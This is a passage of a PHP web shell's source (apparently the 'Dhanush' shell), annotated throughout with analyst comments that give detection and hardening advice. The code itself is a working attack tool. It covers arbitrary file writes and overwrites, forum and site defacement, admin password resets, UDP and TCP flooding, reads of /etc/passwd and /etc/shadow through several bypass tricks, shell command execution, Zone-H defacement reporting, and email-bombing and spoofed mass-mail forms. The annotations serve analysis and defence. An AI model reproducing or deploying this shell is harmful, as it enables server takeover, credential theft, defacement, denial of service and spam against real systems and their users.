2495else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
2496{
 // Analyst note: arbitrary file write. Opens the POSTed path with "w+"
 // (create or truncate) and writes the POSTed content, so it can both plant
 // new files and overwrite existing ones anywhere the PHP user may write.
 // Detection: new or truncated files in web-served directories correlated
 // with POSTs carrying 'filecreator' and 'filecontent'.
 // Mitigation: read-only application directories for the PHP user, and no
 // script execution in directories that must stay writable (uploads, cache).
2497 $content = $_POST['filecontent'];
2498 if($file_pointer = fopen($_POST['filecreator'], "w+"))
2499 {
2500 fwrite($file_pointer, $content);
2501 fclose($file_pointer);
2502 echo "<font class=txt>File Created Successfully</font>";
2503 }
2504 else
2505 echo "Cannot Create File";
2506}
2507else if(isset($_REQUEST["defaceforum"]))
2508{
 // Analyst note: HTML form for the 'forumdeface' handler. It collects the
 // database host, name, user and password (f1..f4), the target type, table
 // prefix, site URL, heading, category id (f5) and replacement content, and
 // passes them to the client-side forumdefacefn() function (defined outside
 // this block). The form action echoes $self without escaping.
 // The field names and the default textarea text are usable as static
 // signatures when scanning a web root for copies of this shell.
2509 ?>
2510 <center><div id="showdeface"></div>
2511 <font color="#FF0000" size="4">Forum Index Changer</font>
2512 <form action="<?php echo $self; ?>" method = "POST">
2513 <input type="hidden" name="forum">
2514 <input type="hidden" name="defaceforum">
2515 <table border = "1" width="60%" style="text-align: center;border-color:#333333;" align="center">
2516 <tr>
2517 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
2518
2519 <td width="50%"><b> Database :</b> <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
2520 <tr><td height="50" width="50%"><b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"> </td>
2521 <td><b> Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2522
2523 <tr><td height="50" width="50%">Type :
2524 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
2525 <option value="vb">vbulletin</option>
2526 <option value="mybb">Mybb</option>
2527 <option value="smf">SMF</option>
2528 <option value="ipb">IPB</option>
2529 <option value="wp">Wordpress</option>
2530 <option value="joomla">Joomla</option>
2531 </select></td>
2532 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
2533
2534 </tr>
2535 <tr>
2536 <td height="167" width="50%" colspan=2>
2537 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
2538
2539 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
2540 <label id="wordpres" style="display:none; float:right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="checked"> All</label></p>
2541 </div>
2542
2543 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
2544 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
2545 </td>
2546 </tr>
2547 </table>
2548 </form>
2549 </center>
2550 <?php
2551 }
2552 else if(isset($_GET["passwordchange"]))
2553 {
2554 echo "<center>";
2555 ?>
2556 <div id="showchangepass"></div>
2557 <font color="#FF0000" size="4">Forum Password Changer</font>
2558 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value);return false;">
2559 <table border = "1" width="60%" height="246" style="text-align: center;border-color:#333333;" align="center">
2560 <tr>
2561 <td height="50" width="50%"> <b>Host : </b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> <b> DataBase :</b> <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> <b>User :</b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> <b>Password :</b> <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
2562 <tr>
2563 <td height="50" width="50%">Type :
2564 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
2565 <option value="vb">vbulletin</option>
2566 <option value="mybb">Mybb</option>
2567 <option value="smf">SMF</option>
2568 <option value="ipb">IPB</option>
2569 <option value="phpbb">PHPBB</option>
2570 <option value="wp">Wordpress</option>
2571 <option value="joomla">Joomla</option>
2572 </select></td>
2573 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
2574 </tr>
2575 <tr>
2576 <td colspan=2 height="100" width="780">
2577
2578 <p align="center"><div id="fid" style="display:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
2579
2580 <div id="joomla" style="display:none;"><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> <b>New Password :</b> <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
2581
2582 <div id="wpress" style="display:none;"><p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"></div>
2583
2584 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
2585 </tr>
2586 </table>
2587 </form>
2588 </center>
2589 <?php
2590}
// Analyst note: "dosser" action. This branch is a UDP flood whose target address,
// port, payload size, socket timeout and duration all come from the query string.
// The only checks are that the values are present and non-empty; any access
// control would have to sit outside this branch.
// Detection: a web-server PHP worker repeatedly opening udp:// sockets, and request
// lines that carry dosser, ip, port, exTime and timeout together.
// Containment: egress filtering that denies arbitrary outbound UDP from web hosts.
2591else if(isset($_GET['dosser']))
2592{
2593 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
2594 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
2595 {
2596 $IP=$_GET['ip'];
2597 $port=$_GET['port'];
2598 $executionTime = $_GET['exTime'];
// no0fBytes is read here although the guard above never tests it.
2599 $no0fBytes = $_GET['no0fBytes'];
2600 $data = "";
2601 $timeout = $_GET['timeout'];
2602 $packets = 0;
2603 $counter = $no0fBytes;
// Wall-clock deadline. The top of the file calls set_time_limit(0), so PHP's own
// execution limit does not end the loop earlier.
2604 $maxTime = time() + $executionTime;;
2605 while($counter--)
2606 {
2607 $data .= "X";
2608 }
// Fixed payload suffix: a run of "X" followed by " Dhanush" is a usable content
// signature for network detection.
2609 $data .= " Dhanush";
2610
2611 while(1)
2612 {
2613 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
2614 if($socket)
2615 {
2616 fwrite($socket , $data);
2617 fclose($socket);
2618 $packets++;
2619 }
2620 if(time() >= $maxTime)
2621 {
2622 break;
2623 }
2624 }
// Result summary returned to the operator; HumanReadableFilesize() is defined
// outside this view.
2625 echo "Dos Completed!<br>";
2626 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
2627 echo "Total Number of Packets Sent : " . $packets . "<br />";
2628 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
2629 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
2630 }
2631}
// Analyst note: "fuzzer" action. This branch opens a fresh connection to a
// request-supplied host and port exTime times and writes one oversized,
// HTTP-looking request line each time. All inputs come from the query string and
// are only checked for presence and non-emptiness.
// Detection on the receiving side: request lines that contain the literal
// "%s%s%s%s%d%x%c%n%n%n%nby-Dhanush" and end in LF-CR pairs rather than CRLF.
// Detection on the compromised host: bursts of short outbound connections from
// the PHP worker.
2632else if(isset($_GET['fuzzer']))
2633{
2634 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
2635 {
2636 $IP=$_GET['ip'];
2637 $port=$_GET['port'];
2638 $times = $_GET['exTime'];
2639 $timeout = $_GET['timeout'];
2640 $send = 0;
2641 $ending = "";
2642 $multiplier = $_GET['multiplier'];
2643 $data = "";
// $mode is "tcp" on every path visible here; the type parameter cannot change it.
2644 $mode="tcp";
2645 $data .= "GET /";
2646 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
2647 if($_GET['type'] == "tcp")
2648 {
2649 $mode = "tcp";
2650 }
2651
// The request path is the URL-encoded no0fBytes value repeated multiplier times.
2652 while($multiplier--)
2653 {
2654 $data .= urlencode($_GET['no0fBytes']);
2655 }
2656 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
2657 $data .= "by-Dhanush".$ending;
2658 $length = strlen($data);
2659
2660
// The payload is echoed back to the operator without HTML escaping.
2661 echo "Sending Data :- <br /> <p align='center'>$data</p>";
2662
2663 for($i=0;$i<$times;$i++)
2664 {
2665 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
2666 if($socket)
2667 {
2668 fwrite($socket , $data , $length );
2669 fclose($socket);
2670 }
2671 }
// The reported packet count is the requested count ($times), not the number of
// writes that succeeded.
2672 echo "Fuzzing Completed!<br>";
2673 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
2674 echo "Total Number of Packets Sent : " . $times . "<br />";
2675 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
2676 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
2677 }
2678}
// Analyst note: "bypassit" action. This branch is a collection of alternative
// ways to read a file named in the query string, each going through a different
// PHP extension or external program. The page's own form labels the group "Safe
// mode bypass". Every path or command argument below is attacker-controlled unless
// noted otherwise.
// Hardening that removes most sub-branches: open_basedir, disable_functions for
// the process-execution functions, local-infile disabled on the MySQL client and
// server, and a web server that does not follow symlinks out of the document root.
2679else if(isset($_GET['bypassit']))
2680{
// copy(): duplicates the requested file to "test1.php" in the current working
// directory, prints it HTML-escaped, then deletes the copy. A short-lived
// test1.php is a filesystem artefact worth alerting on.
2681 if(isset($_GET['copy']))
2682 {
2683 if(@copy($_GET['copy'],"test1.php"))
2684 {
2685 $fh=fopen("test1.php",'r');
2686 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
2687 @fclose($fh);
2688 unlink("test1.php");
2689 }
2690 }
// imap: passes the request value to imap_open() as the mailbox argument with
// empty credentials. The imap_body() result is assigned to $str and never
// printed in this branch.
2691 else if(isset($_GET['imap']))
2692 {
2693 $string = $_GET['imap'];
2694 echo "<textarea cols=120 rows=20 class=box readonly>";
2695 $stream = imap_open($string, "", "");
2696 $str = imap_body($stream, 1);
2697 echo "</textarea>";
2698 }
// sql: loads the requested file into a temporary table with LOAD DATA LOCAL
// INFILE and selects it back. $mdb, $mhost, $muser and $mpass are not assigned
// in this branch (presumably set elsewhere in the file), and $mysql_files is
// built but not used here. The mysql_* extension was removed in PHP 7.0, so this
// path only runs on older interpreters.
2699 else if(isset($_GET['sql']))
2700 {
2701 echo "<textarea cols=120 rows=20 class=box readonly>";
2702 $file=$_GET['sql'];
2703
2704 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2705 $mysql_files = explode(':', $mysql_files_str);
2706
2707 $sql = array (
2708 "USE $mdb",
2709 'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
2710 "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
2711 . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
2712 . "ESCAPED BY '' "
2713 . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
2714
2715 "SELECT a FROM $tbl LIMIT 1"
2716 );
2717 mysql_connect ($mhost, $muser, $mpass);
2718
2719 foreach ($sql as $statement) {
2720 $q = mysql_query ($statement);
2721
2722 if ($q == false) die (
2723 "FAILED: " . $statement . "\n" .
2724 "REASON: " . mysql_error () . "\n"
2725 );
2726
2727 if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
2728
2729 echo htmlspecialchars($r[0]);
2730 mysql_free_result ($q);
2731 }
2732 echo "</textarea>";
2733 }
// curl: requests a file:// URL built from the request value and prints the
// response HTML-escaped.
2734 else if(isset($_GET['curl']))
2735 {
2736 $ch=curl_init("file://" . $_GET[curl]);
2737 curl_setopt($ch,CURLOPT_HEADERS,0);
2738 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2739 $file_out=curl_exec($ch);
2740 curl_close($ch);
2741 echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
2742 }
// include: include() on a request-supplied path. Any PHP inside the named file
// is executed, not merely displayed, and the output is not escaped. The failure
// message also reflects the raw parameter.
2743 else if(isset($_GET['include']))
2744 {
2745 if(file_exists($_GET['include']))
2746 {
2747 echo "<textarea cols=120 rows=20 class=box readonly>";
2748 @include($_GET['include']);
2749 echo "</textarea>";
2750 }
2751 else
2752 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
2753 }
// id: ignores the parameter value and enumerates local accounts by calling
// posix_getpwuid() for every UID from 0 to 59999, printing each field separated
// by ":". each() was removed in PHP 8.0.
2754 else if(isset($_GET['id']))
2755 {
2756 echo "<textarea cols=120 rows=20 class=box readonly>";
2757 for($uid=0;$uid<60000;$uid++)
2758 { //cat /etc/passwd
2759 $ara = posix_getpwuid($uid);
2760 if (!empty($ara))
2761 {
2762 while (list ($key, $val) = each($ara))
2763 {
2764 print "$val:";
2765 }
2766 print "\n";
2767 }
2768 }
2769 echo "</textarea>";
2770 break;
2771 }
// tempnam: uses the request value as the tempnam() prefix with directory 'tmp',
// then opens and prints whatever file name tempnam() returned, unescaped.
2772 else if(isset($_GET['tempnam']))
2773 {
2774 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
2775 $fp = fopen ( $mytmp, 'r' );
2776 while(!feof($fp))
2777 echo fgets($fp);
2778 fclose ( $fp );
2779 }
// symlnk: the parameter value is not used; the target is hard-coded. Creates a
// world-writable directory "mydhanush" under the current directory, symlinks
// /etc/passwd into it via execmd() (defined outside this view), then fetches the
// link over HTTP from the server's own Host header. A "mydhanush" directory in
// the web root is a strong indicator of this shell.
2780 else if(isset($_GET['symlnk']))
2781 {
2782 echo "<textarea cols=120 rows=20 class=box readonly>";
2783 @mkdir("mydhanush",0777);
2784 @chdir("mydhanush");
2785 execmd("ln -s /etc/passwd");
2786
2787 echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/mydhanush/passwd");
2788 echo "</textarea>";
2789 }
// newtype: a plain "if", so it is evaluated in addition to whichever branch
// above matched. The request value is concatenated unescaped into a shell command
// line, so this is command execution with the web server's privileges and not
// only a file read. Detection: the web-server user spawning xxd, rev, tac, more
// or less.
2790 if(isset($_GET['newtype']))
2791 {
2792 $filename = $_GET['newtype'];
2793 echo "<textarea cols=120 rows=20 class=box readonly>";
2794 if($_GET['optiontype'] == "xxd")
2795 echo execmd("xxd ".$filename);
2796 else if($_GET['optiontype'] == "rev")
2797 echo execmd("rev ".$filename);
2798 if($_GET['optiontype'] == "tac")
2799 echo execmd("tac ".$filename);
2800 if($_GET['optiontype'] == "more")
2801 echo execmd("more ".$filename);
2802 if($_GET['optiontype'] == "less")
2803 echo execmd("less ".$filename);
2804 echo "</textarea>";
2805 }
2806}
2807// Deface Website
// Analyst note: "deface" action. Opens the request-supplied path in mode 'w',
// which truncates an existing file, and writes the decoded $ind string that is
// set as base64 near the top of the file. The path is not validated, so any file
// the web-server user can write is at risk.
// Detection: file-integrity monitoring on index and template files, and
// unexpected mtime changes under the document root.
2808else if(isset($_GET['deface']))
2809{
2810 $myfile = fopen($_GET['deface'],'w');
2811 if(fwrite($myfile, base64_decode($ind)))
2812 {fclose($myfile);
2813 echo "Index Defaced Successfully";}
2814 else
2815 echo "Donot have write permission";
2816}
2817else if(isset($_GET['perms']))
2818{
2819?>
2820 <form>
2821 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
2822 <table align="center" border="1" style="width:40%;border-color:#333333;">
2823 <tr>
2824 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
2825 </tr>
2826 <tr>
2827 <td colspan="2" align="center" style="height:60px">
2828 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
2829 </tr>
2830 </table>
2831
2832 </form>
2833 <?php
2834}
// Analyst note: "chmode" action. Changes the permission bits of a request-supplied
// path. The mode string must pass is_numeric(); it is then interpreted digit by
// digit as base 8, so "0755" becomes octal 0755.
// Detection: chmod calls from the web-server user on files under the document
// root, especially to world-writable modes.
2835else if(isset($_GET["chmode"]))
2836{
2837 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
2838 {
2839 $perms = 0;
// Accumulates digit * 8^position, walking the string from its last character.
2840 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
2841 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
2842 if(@chmod($_GET['myfilename'],$perms))
2843 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
2844 else
2845 echo "<center><blink>Cannot Change File Permissions</blink></center>";
2846 }
2847}
2848else if(isset($_GET['rename']))
2849{
2850?>
2851 <form>
2852 <table border="0" cellpadding="3" cellspacing="3">
2853 <tr>
2854 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
2855 </tr>
2856 <tr>
2857 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
2858 </tr>
2859 <tr>
2860 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/></td>
2861 </tr>
2862 </table>
2863 </form>
2864 <?php
2865
2866}
// Analyst note: "renamemyfile" action. Calls rename() with source and destination
// both taken from the query string and no path restriction, so it also works as
// a move across directories the web-server user can write to.
2867else if(isset($_GET['renamemyfile']))
2868{
2869 if(isset($_GET['to']) && isset($_GET['file']))
2870 {
2871 if(!rename($_GET['file'], $_GET['to']))
2872 echo "Cannot Rename File";
2873 else
2874 echo "<font class=txt>File Renamed Successfully</font>";
2875
2876 }
2877}
2878else if(isset($_GET['open']))
2879{
2880 if(is_file($_GET['myfilepath']))
2881 {
2882 $owner = "0/0";
2883 if($os == "Linux")
2884 $owner = getOGid($_GET['myfilepath']);
2885 ?>
2886 <form>
2887 <table style="width:57%;">
2888 <tr align="left">
2889 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
2890 </tr>
2891 <tr>
2892 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
2893 </tr>
2894 </table>
2895 <textarea name="content" rows="15" cols="100" class="box"><?php
2896 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
2897 if($content)
2898 {
2899 echo $content;
2900 }
2901 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
2902 {
2903 if(filesize($_GET['myfilepath']) != 0 )
2904 {
2905 fopen($_GET['myfilepath']);
2906 while(!feof())
2907 {
2908 echo htmlspecialchars(fgets($_GET['myfilepath']));
2909 }
2910 }
2911 }
2912
2913 ?>
2914 </textarea><br />
2915 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
2916 </form>
2917 <?php
2918 }
2919 else
2920 echo "File does not exist !!!!";
2921}
// Analyst note: file-save handler. Overwrites an existing file with the POSTed
// content. The path and the content are both attacker-controlled, and the only
// guard is file_exists(). The handle is not closed in this branch.
// Detection: POST requests carrying both "file" and "content" fields, followed by
// modified files under the document root.
2922else if(isset($_POST['file']) && isset($_POST['content']))
2923{
2924 if(file_exists($_POST['file']))
2925 {
// Mode "w" truncates the target before writing.
2926 $handle = fopen($_POST['file'],"w");
2927 if(fwrite($handle,$_POST['content']))
2928 echo "<font class=txt>File Saved Successfully!</font>";
2929 else
2930 echo "Cannot Write into File";
2931 }
2932 else
2933 {
2934 echo "File Name Specified does not exists!";
2935 }
2936}
// Analyst note: "SendNowToZoneH" action. Submits a newline-separated list of
// sites to a defacement-archive notification endpoint, one HTTP POST per site.
// Detection: outbound HTTP from the web server to zone-h.org/notify/single, which
// a production web host has no ordinary reason to contact.
2937else if(isset($_POST["SendNowToZoneH"]))
2938{
2939 $hacker = $_POST['defacer'];
2940 $method = $_POST['hackmode'];
2941 $neden = $_POST['reason'];
2942 $site = $_POST['domain'];
2943
// Form validation: each failure ends the request with die() and a message.
2944 if (empty($hacker))
2945 {
2946 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
2947 }
2948 elseif($method == "--------SELECT--------")
2949 {
2950 die("<center><font size=3>[-] You Must Select The Method !</center>");
2951 }
2952 elseif($neden == "--------SELECT--------")
2953 {
2954 die("<center><font size=3>[-] You Must Select The Reason</center>");
2955 }
2956 elseif(empty($site))
2957 {
2958 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
2959 }
2960 // Zone-h Poster
// ZoneH(): POSTs the four form fields to $url with cURL, follows redirects and
// returns the response body. The field values are concatenated into the body
// without URL-encoding.
2961 function ZoneH($url, $hacker, $hackmode,$reson, $site )
2962 {
2963 $k = curl_init();
2964 curl_setopt($k, CURLOPT_URL, $url);
2965 curl_setopt($k,CURLOPT_POST,true);
2966 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2967 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2968 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2969 $kubra = curl_exec($k);
2970 curl_close($k);
2971 return $kubra;
2972 }
2973
2974 $i = 0;
2975 $sites = explode("\n", $site);
2976 echo "<pre class=ml1 style='margin-top:5px'>";
2977 while($i < count($sites))
2978 {
// Entries that do not start with "http" get an "http://" prefix.
2979 if(substr($sites[$i], 0, 4) != "http")
2980 {
2981 $sites[$i] = "http://".$sites[$i];
2982 }
// The return value is discarded, so "Posted !" is printed whether or not the
// request succeeded. The site string is echoed without HTML escaping.
2983 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2984 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
2985 ++$i;
2986 }
2987
2988 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2989}
// Analyst note: "executemycmd" action, the shell's direct command-execution
// primitive. Changes to a request-supplied directory and passes a request-supplied
// string to shell_exec(), echoing the output unescaped.
// Detection: query strings containing executemycmd / executepath, and the
// web-server user spawning a shell.
// Hardening: list the process-execution functions in disable_functions where the
// application does not need them.
2990else if(isset($_GET['executemycmd']))
2991{
2992 $comm = $_GET['executemycmd'];
2993 chdir($_GET['executepath']);
2994 echo shell_exec($comm);
2995}
2996// View Passwd file
2997else if(isset($_GET['passwd']))
2998{
2999 $test='';
3000 $tempp= tempnam($test, "cx");
3001 $get = "/etc/passwd";
3002 $name=@posix_getpwuid(@fileowner($get));
3003 $group=@posix_getgrgid(@filegroup($get));
3004 $owner = $name['name']. " / ". $group['name'];
3005 ?>
3006 <table style="width:57%;">
3007 <tr>
3008 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
3009 </tr>
3010 <tr>
3011 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
3012 </tr>
3013 </table>
3014 <?php
3015 if(copy("compress.zlib://".$get, $tempp))
3016 {
3017 $fopenzo = fopen($tempp, "r");
3018 $freadz = fread($fopenzo, filesize($tempp));
3019 fclose($fopenzo);
3020 $source = htmlspecialchars($freadz);
3021 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
3022 unlink($tempp);
3023 }
3024 else
3025 {
3026 ?>
3027 <form>
3028 <input type="hidden" name="etcpasswd">
3029 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
3030 <tr>
3031 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
3032 </tr>
3033 <tr>
3034 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
3035 </tr>
3036 <tr>
3037 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
3038 </tr>
3039 </table><br>
3040 </form>
3041 <?php
3042 }
3043}
// Analyst note: "shadow" action. Tries to copy /etc/shadow through the
// compress.zlib:// stream wrapper into a temp file created with prefix "cx",
// prints the contents HTML-escaped and deletes the temp file. It only succeeds if
// the web-server user can read /etc/shadow, which itself points to a permissions
// or privilege problem on the host.
// Detection: read attempts on /etc/shadow by the web-server user (for example via
// audit rules) and short-lived temp files whose names start with "cx".
3044else if(isset($_GET['shadow']))
3045{
// An empty directory argument makes tempnam() fall back to the system temp directory.
3046 $test='';
3047 $tempp= tempnam($test, "cx");
3048 $get = "/etc/shadow";
3049 if(copy("compress.zlib://".$get, $tempp))
3050 {
3051 $fopenzo = fopen($tempp, "r");
3052 $freadz = fread($fopenzo, filesize($tempp));
3053 fclose($fopenzo);
3054 $source = htmlspecialchars($freadz);
3055 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
3056 unlink($tempp);
3057 }
3058}
3059else if(isset($_GET['bomb']))
3060{
3061 ?><div id="showmail"></div>
3062 <form>
3063 <table id="margins" style="width:100%;">
3064 <tr>
3065 <td style="width:30%;">To</td>
3066 <td>
3067 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
3068 </td>
3069 </tr>
3070 <tr>
3071 <td style="width:30%;">Subject</td>
3072 <td>
3073 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
3074 </td>
3075 </tr>
3076 <tr>
3077 <td style="width:30%;">No. of Times</td>
3078 <td>
3079 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
3080 </td>
3081 </tr>
3082 <tr>
3083 <td style="width:30%;">Pad your message (Less spam detection)</td>
3084 <td><input type="checkbox" name="padding"/></td>
3085 </tr>
3086 <tr>
3087 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
3088 </tr>
3089 <tr>
3090 <td rowspan="2">
3091 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
3092 </td>
3093 </tr>
3094 </table>
3095 </form>
3096 <?php
3097}
3098
3099//Mass Mailer
3100else if(isset($_GET['mail']))
3101{
3102 ?><div id="showmail"></div>
3103 <div align="left">
3104 <form>
3105 <table align="left" style="width:100%;">
3106 <tr>
3107 <td style="width:10%;">From</td>
3108 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.gov';"/></td>
3109 </tr>
3110
3111 <tr>
3112 <td style="width:20%;">To</td>
3113 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
3114 </tr>
3115
3116 <tr>
3117 <td style="width:20%;">Subject</td>
3118 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
3119 </tr>
3120
3121
3122 <tr>
3123 <td colspan="2">
3124 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!!</textarea>
3125 </td>
3126 </tr>
3127
3128
3129 <tr>
3130 <td rowspan="2">
3131 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
3132 </td>
3133 </tr>
3134 </table>
3135 </form></div>
3136 <?php
3137}
3138// Get Domains
3139else if(isset($_REQUEST["symlinkserver"]))
3140{
3141 ?>
3142 <center><table><tr>
